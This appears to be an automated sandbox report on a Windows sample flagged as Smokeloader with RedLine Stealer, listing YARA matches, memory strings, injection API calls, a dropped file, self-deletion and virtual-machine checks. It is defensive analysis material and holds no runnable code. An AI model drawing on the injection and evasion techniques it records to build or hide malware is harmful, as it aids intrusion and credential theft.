      Source: explorer.exe, 00000001.00000000.1719274631.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
      Source: explorer.exe, 00000001.00000000.1723311543.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com_
      Source: explorer.exe, 00000001.00000000.1723311543.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
      Source: explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
      Source: explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
      Source: explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
      Source: explorer.exe, 00000001.00000000.1723311543.000000000C557000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/L
      Source: explorer.exe, 00000001.00000000.1723311543.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
      Source: explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
      Source: explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
      Source: explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1719274631.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
      Source: explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
      Source: explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
      Source: explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
      Source: explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
      Source: explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
      Source: explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
      Source: explorer.exe, 00000001.00000000.1719274631.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
      Source: explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
      Source: explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
      Source: explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
      Source: explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
      Source: explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
      Source: explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe

      Key, Mouse, Clipboard, Microphone and Screen Capturing

      barindex
      Source: Yara matchFile source: 00000000.00000002.1729177326.0000000002631000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.1973355708.00000000043B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.1729125452.0000000002600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.1973179203.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

      System Summary

      barindex
      Source: 00000000.00000002.1729177326.0000000002631000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000000.00000002.1729366012.000000000285D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
      Source: 00000000.00000002.1729108326.00000000025F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
      Source: 00000004.00000002.1973355708.00000000043B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000000.00000002.1729125452.0000000002600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000004.00000002.1972746903.0000000002710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
      Source: 00000004.00000002.1973179203.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000004.00000002.1972868127.000000000273D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
      Source: C:\Windows\explorer.exeProcess Stats: CPU usage > 49%
      Source: C:\Users\user\Desktop\k8JAXb3Lhs.exeCode function: 0_2_00401514 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,LoadLibraryA,NtMapViewOfSection,0_2_00401514
      Source: C:\Users\user\Desktop\k8JAXb3Lhs.exeCode function: 0_2_00402F97 RtlCreateUserThread,NtTerminateProcess,0_2_00402F97
      Source: C:\Users\user\Desktop\k8JAXb3Lhs.exeCode function: 0_2_00401542 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,LoadLibraryA,NtMapViewOfSection,0_2_00401542
      Source: C:\Users\user\Desktop\k8JAXb3Lhs.exeCode function: 0_2_00403247 NtTerminateProcess,GetModuleHandleA,0_2_00403247
      Source: C:\Users\user\Desktop\k8JAXb3Lhs.exeCode function: 0_2_00401549 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,LoadLibraryA,NtMapViewOfSection,0_2_00401549
      Source: C:\Users\user\Desktop\k8JAXb3Lhs.exeCode function: 0_2_0040324F NtTerminateProcess,GetModuleHandleA,0_2_0040324F
      Source: C:\Users\user\Desktop\k8JAXb3Lhs.exeCode function: 0_2_00403256 NtTerminateProcess,GetModuleHandleA,0_2_00403256
      Source: C:\Users\user\Desktop\k8JAXb3Lhs.exeCode function: 0_2_00401557 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,LoadLibraryA,NtMapViewOfSection,0_2_00401557
      Source: C:\Users\user\Desktop\k8JAXb3Lhs.exeCode function: 0_2_0040326C NtTerminateProcess,GetModuleHandleA,0_2_0040326C
      Source: C:\Users\user\Desktop\k8JAXb3Lhs.exeCode function: 0_2_00403277 NtTerminateProcess,GetModuleHandleA,0_2_00403277
      Source: C:\Users\user\Desktop\k8JAXb3Lhs.exeCode function: 0_2_004014FE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,LoadLibraryA,NtMapViewOfSection,0_2_004014FE
      Source: C:\Users\user\Desktop\k8JAXb3Lhs.exeCode function: 0_2_00403290 NtTerminateProcess,GetModuleHandleA,0_2_00403290
      Source: C:\Users\user\AppData\Roaming\sfjujsrCode function: 4_2_00401514 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,LoadLibraryA,NtMapViewOfSection,4_2_00401514
      Source: C:\Users\user\AppData\Roaming\sfjujsrCode function: 4_2_00402F97 RtlCreateUserThread,NtTerminateProcess,4_2_00402F97
      Source: C:\Users\user\AppData\Roaming\sfjujsrCode function: 4_2_00401542 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,LoadLibraryA,NtMapViewOfSection,4_2_00401542
      Source: C:\Users\user\AppData\Roaming\sfjujsrCode function: 4_2_00403247 NtTerminateProcess,GetModuleHandleA,4_2_00403247
      Source: C:\Users\user\AppData\Roaming\sfjujsrCode function: 4_2_00401549 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,LoadLibraryA,NtMapViewOfSection,4_2_00401549
      Source: C:\Users\user\AppData\Roaming\sfjujsrCode function: 4_2_0040324F NtTerminateProcess,GetModuleHandleA,4_2_0040324F
      Source: C:\Users\user\AppData\Roaming\sfjujsrCode function: 4_2_00403256 NtTerminateProcess,GetModuleHandleA,4_2_00403256
      Source: C:\Users\user\AppData\Roaming\sfjujsrCode function: 4_2_00401557 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,LoadLibraryA,NtMapViewOfSection,4_2_00401557
      Source: C:\Users\user\AppData\Roaming\sfjujsrCode function: 4_2_0040326C NtTerminateProcess,GetModuleHandleA,4_2_0040326C
      Source: C:\Users\user\AppData\Roaming\sfjujsrCode function: 4_2_00403277 NtTerminateProcess,GetModuleHandleA,4_2_00403277
      Source: C:\Users\user\AppData\Roaming\sfjujsrCode function: 4_2_004014FE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,LoadLibraryA,NtMapViewOfSection,4_2_004014FE
      Source: C:\Users\user\AppData\Roaming\sfjujsrCode function: 4_2_00403290 NtTerminateProcess,GetModuleHandleA,4_2_00403290
      Source: k8JAXb3Lhs.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: 00000000.00000002.1729177326.0000000002631000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000000.00000002.1729366012.000000000285D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
      Source: 00000000.00000002.1729108326.00000000025F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
      Source: 00000004.00000002.1973355708.00000000043B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000000.00000002.1729125452.0000000002600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000004.00000002.1972746903.0000000002710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
      Source: 00000004.00000002.1973179203.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000004.00000002.1972868127.000000000273D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
      Source: classification engineClassification label: mal100.troj.evad.winEXE@3/2@6/2
      Source: C:\Users\user\Desktop\k8JAXb3Lhs.exeCode function: 0_2_0286F737 CreateToolhelp32Snapshot,Module32First,0_2_0286F737
      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\sfjujsrJump to behavior
      Source: k8JAXb3Lhs.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\k8JAXb3Lhs.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\k8JAXb3Lhs.exe "C:\Users\user\Desktop\k8JAXb3Lhs.exe"
      Source: unknownProcess created: C:\Users\user\AppData\Roaming\sfjujsr C:\Users\user\AppData\Roaming\sfjujsr
      Source: unknownProcess created: C:\Users\user\AppData\Roaming\sfjujsr C:\Users\user\AppData\Roaming\sfjujsr
      Source: C:\Users\user\Desktop\k8JAXb3Lhs.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\k8JAXb3Lhs.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\k8JAXb3Lhs.exeSection loaded: msimg32.dllJump to behavior
      Source: C:\Users\user\Desktop\k8JAXb3Lhs.exeSection loaded: msvcr100.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: msvcp140.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: windows.internal.shell.broker.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: mfsrcsnk.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\sfjujsrSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\sfjujsrSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\sfjujsrSection loaded: msimg32.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\sfjujsrSection loaded: msvcr100.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\sfjujsrSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{603D3801-BD81-11d0-A3A5-00C04FD706EC}\InProcServer32Jump to behavior
      Source: C:\Users\user\Desktop\k8JAXb3Lhs.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
      Source: k8JAXb3Lhs.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

      Data Obfuscation

      barindex
      Source: C:\Users\user\Desktop\k8JAXb3Lhs.exeUnpacked PE file: 0.2.k8JAXb3Lhs.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
      Source: C:\Users\user\AppData\Roaming\sfjujsrUnpacked PE file: 4.2.sfjujsr.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
      Source: C:\Users\user\Desktop\k8JAXb3Lhs.exeCode function: 0_2_004014D9 pushad ; ret 0_2_004014E9
      Source: C:\Users\user\Desktop\k8JAXb3Lhs.exeCode function: 0_2_004031DB push eax; ret 0_2_004032AB
      Source: C:\Users\user\Desktop\k8JAXb3Lhs.exeCode function: 0_2_025F1540 pushad ; ret 0_2_025F1550
      Source: C:\Users\user\Desktop\k8JAXb3Lhs.exeCode function: 0_2_02873190 push esp; ret 0_2_02873192
      Source: C:\Users\user\Desktop\k8JAXb3Lhs.exeCode function: 0_2_02871533 push B63524ADh; retn 001Fh0_2_0287156A
      Source: C:\Users\user\Desktop\k8JAXb3Lhs.exeCode function: 0_2_02872030 pushfd ; iretd 0_2_02872031
      Source: C:\Users\user\AppData\Roaming\sfjujsrCode function: 4_2_004014D9 pushad ; ret 4_2_004014E9
      Source: C:\Users\user\AppData\Roaming\sfjujsrCode function: 4_2_004031DB push eax; ret 4_2_004032AB
      Source: C:\Users\user\AppData\Roaming\sfjujsrCode function: 4_2_02711540 pushad ; ret 4_2_02711550
      Source: C:\Users\user\AppData\Roaming\sfjujsrCode function: 4_2_02752B30 push esp; ret 4_2_02752B32
      Source: C:\Users\user\AppData\Roaming\sfjujsrCode function: 4_2_027519D0 pushfd ; iretd 4_2_027519D1
      Source: C:\Users\user\AppData\Roaming\sfjujsrCode function: 4_2_02750ED3 push B63524ADh; retn 001Fh4_2_02750F0A
      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\sfjujsrJump to dropped file
      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\sfjujsrJump to dropped file

      Hooking and other Techniques for Hiding and Protection

      barindex
      Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\k8jaxb3lhs.exeJump to behavior
      Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\sfjujsr:Zone.Identifier read attributes | deleteJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Source: C:\Users\user\Desktop\k8JAXb3Lhs.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\k8JAXb3Lhs.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\k8JAXb3Lhs.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\k8JAXb3Lhs.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\k8JAXb3Lhs.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\k8JAXb3Lhs.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\sfjujsrKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\sfjujsrKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\sfjujsrKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\sfjujsrKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\sfjujsrKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\sfjujsrKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\k8JAXb3Lhs.exeAPI/Special instruction interceptor: Address: 7FFE2220E814
      Source: C:\Users\user\Desktop\k8JAXb3Lhs.exeAPI/Special instruction interceptor: Address: 7FFE2220D584
      Source: C:\Users\user\AppData\Roaming\sfjujsrAPI/Special instruction interceptor: Address: 7FFE2220E814
      Source: C:\Users\user\AppData\Roaming\sfjujsrAPI/Special instruction interceptor: Address: 7FFE2220D584
      Source: k8JAXb3Lhs.exe, 00000000.00000002.1729313143.000000000284E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOK
      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 514Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 2296Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 892Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 2518Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 890Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 863Jump to behavior
      Source: C:\Windows\explorer.exe TID: 2640Thread sleep count: 514 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 2056Thread sleep count: 2296 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 2056Thread sleep time: -229600s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exe TID: 3736Thread sleep count: 892 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 3736Thread sleep time: -89200s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exe TID: 5228Thread sleep count: 320 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 4916Thread sleep count: 334 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 4916Thread sleep time: -33400s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exe TID: 1880Thread sleep count: 349 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 1880Thread sleep time: -34900s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exe TID: 2056Thread sleep count: 2518 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 2056Thread sleep time: -251800s >= -30000sJump to behavior
      Source: explorer.exe, 00000001.00000000.1721545742.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
      Source: explorer.exe, 00000001.00000000.1720881139.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00\w
      Source: explorer.exe, 00000001.00000000.1719274631.00000000078A0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
      Source: explorer.exe, 00000001.00000000.1721545742.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
      Source: explorer.exe, 00000001.00000000.1717954667.0000000001248000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
      Source: explorer.exe, 00000001.00000000.1719274631.00000000079FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000001.00000000.1721545742.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
      Source: explorer.exe, 00000001.00000000.1719274631.00000000078AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTTAVMWare
      Source: explorer.exe, 00000001.00000000.1720881139.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
      Source: explorer.exe, 00000001.00000000.1720881139.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1720881139.000000000982D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: explorer.exe, 00000001.00000000.1721545742.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
      Source: explorer.exe, 00000001.00000000.1719274631.0000000007A34000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBnx
      Source: explorer.exe, 00000001.00000000.1720881139.0000000009660000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
      Source: explorer.exe, 00000001.00000000.1717954667.0000000001248000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
      Source: explorer.exe, 00000001.00000000.1717954667.0000000001248000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
